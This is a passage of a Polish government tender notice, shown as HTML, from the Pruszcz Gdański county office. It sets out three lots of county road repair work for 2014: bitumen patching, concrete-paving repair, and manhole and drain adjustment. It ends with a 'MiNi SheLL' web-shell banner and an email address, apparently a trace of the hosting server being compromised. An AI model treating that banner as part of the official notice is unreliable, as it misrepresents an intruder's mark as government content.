<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Pruszczu Gdańskim, ul. Wojska Polskiego 16, pok. nr 122. Specyfikacja nieodpłatna  -  ewentualne koszty przesyłki ..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.02.2014 godzina 11:30, miejsce: Starostwo Powiatowe w Pruszczu Gdańskim, ul. Wojska Polskiego 16, 83 - 000 Pruszcz Gdański, Sekretariat pok. Nr 101
Termin otwarcia ofert: 18.02.2014 r., o godz. 12:00.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie nr 1  - Wykonanie  remontu  cząstkowego nawierzchni  bitumicznych   dróg powiatowych położonych na terenie Powiatu Gdańskiego, o  łącznej  powierzchni  do 8.000 m2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 1  - Wykonanie  remontu  cząstkowego nawierzchni  bitumicznych   dróg powiatowych położonych na terenie Powiatu Gdańskiego, o  łącznej  powierzchni  do 8.000 m2 .
Wykonanie remontu cząstkowego nawierzchni bitumicznych, przy użyciu masy   mineralno - bitumicznej średnioziarnistej zamkniętej wg Polskiej Normy (powierzchnia do 8.000 m2)  oraz wyrównanie podbudowy przy wybojach o głębokości ponad 4 cm mieszanką mineralno - asfaltową wyrównawczą (do 480 ton) na sieci dróg powiatowych, Powiatu Gdańskiego.	
Prace odbywać się będą na sieci dróg powiatowych Powiatu Gdańskiego. Kolejność dróg do remontu zostanie wskazana po podpisaniu umowy z wybranym Wykonawcą - zgodnie z postanowieniami zawartymi we wzorze umowy, który stanowi zał. nr 5 A do niniejszej specyfikacji. Wykaz dróg powiatowych, stanowi załącznik nr 11 do niniejszej specyfikacji. Wskazanie miejsc do remontu nastąpi bezpośrednio przed przystąpieniem do realizacji  robót.
a) realizacja przedmiotu zamówienia odbywać się będzie przy pomocy minimum dwóch grup pracowniczych wybranego Wykonawcy, które wykonywać będą przedmiot zamówienia równolegle w czasie, w dwóch różnych częściach powiatu (szczegóły ustalone będą z wybranym Wykonawcą),  
b) przycięcie   nawierzchni   wokół   uszkodzonego   miejsca   z  nadaniem łacie regularnych kształtów,
c) wyfrezowanie lub wykucie uszkodzonego miejsca z oczyszczeniem, usunięciem oraz   utylizacją rumoszu,
d) skropienie naprawianego miejsca oraz posmarowanie krawędzi emulsją asfaltową,
e) wypełnienie   odpowiednią  mieszanką   mineralno - bitumiczną  łaty z zagęszczeniem do poziomu otaczającej  płaszczyzny nawierzchni,
f) oznakowanie drogi w miejscu wykonywania remontu zgodnie z projektem sporządzonym na podstawie Rozporządzenia  Ministra  Infrastruktury  z  dnia  23.09.2003 r.  w  sprawie  szczegółowych  warunków  zarządzania  ruchem  na drogach oraz wykonywania nadzoru nad tym zarządzaniem (Dz. U. z 2003 r., Nr 177, poz. 1729), 
g) wyrównanie   podbudowy   przy   wybojach   o   głębokości    ponad    4   cm    mieszanką  mineralno -  asfaltową wyrównawczą (szacunkowa ilość: do 480 ton) 
h) ubytki  o  powierzchni   mniejszej   od   1   m2    stanowią  ok.  30 %  ogólnej powierzchni stanowiącej  przedmiot zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2, 45.23.31.42-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.11.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie  nr  2  -  Remont   nawierzchni   i   elementów   ulic    (z   prefabrykowanych  
elementów   betonowych)    dróg    powiatowych    położonych    na   terenie   Powiatu Gdańskiego..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Remont polegający na naprawie  nawierzchni i elementów ulic z prefabrykowanych elementów betonowych (betonowej kostki brukowej, płytek betonowych itp.), wszelkiego rodzaju zapadnięć, zagłębień i ubytków na nawierzchniach, przełożeniem  i wymianą elementów ulic oraz uzupełnieniem podbudów. Prace odbywać się będą na sieci dróg powiatowych Powiatu Gdańskiego. Kolejność dróg do remontu zostanie wskazana po podpisaniu umowy z wybranym Wykonawcą - zgodnie z postanowieniami zawartymi we wzorze umowy, który stanowi zał. nr 5B do niniejszej specyfikacji. Wykaz dróg powiatowych, stanowi załącznik nr 11 do niniejszej specyfikacji. Wskazanie miejsc do remontu nastąpi bezpośrednio przed przystąpieniem do realizacji  robót..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2, 45.23.31.42-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.11.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie   nr   3 -    Regulacja     zapadniętych     i uszkodzonych    włazów    studni  kanalizacyjnych  i  wpustów  deszczowych  w ciągu dróg powiatowych położonych na  terenie Powiatu Gdańskiego..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Regulacja pionowa i pozioma włazów studni kanalizacyjnych i wpustów deszczowych wszystkich rodzajów zapadnięć, pęknięć z uzupełnieniem ubytków. Prace odbywać się będą na sieci dróg powiatowych Powiatu Gdańskiego. Kolejność dróg do remontu zostanie wskazana po podpisaniu umowy z wybranym Wykonawcą - zgodnie z postanowieniami zawartymi we wzorze umowy, który stanowi zał. nr 5B do niniejszej specyfikacji. Wykaz dróg powiatowych, stanowi załącznik nr 11 do niniejszej specyfikacji. Wskazanie miejsc do remontu nastąpi bezpośrednio przed przystąpieniem do realizacji  robót..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2, 45.23.31.42-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.11.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com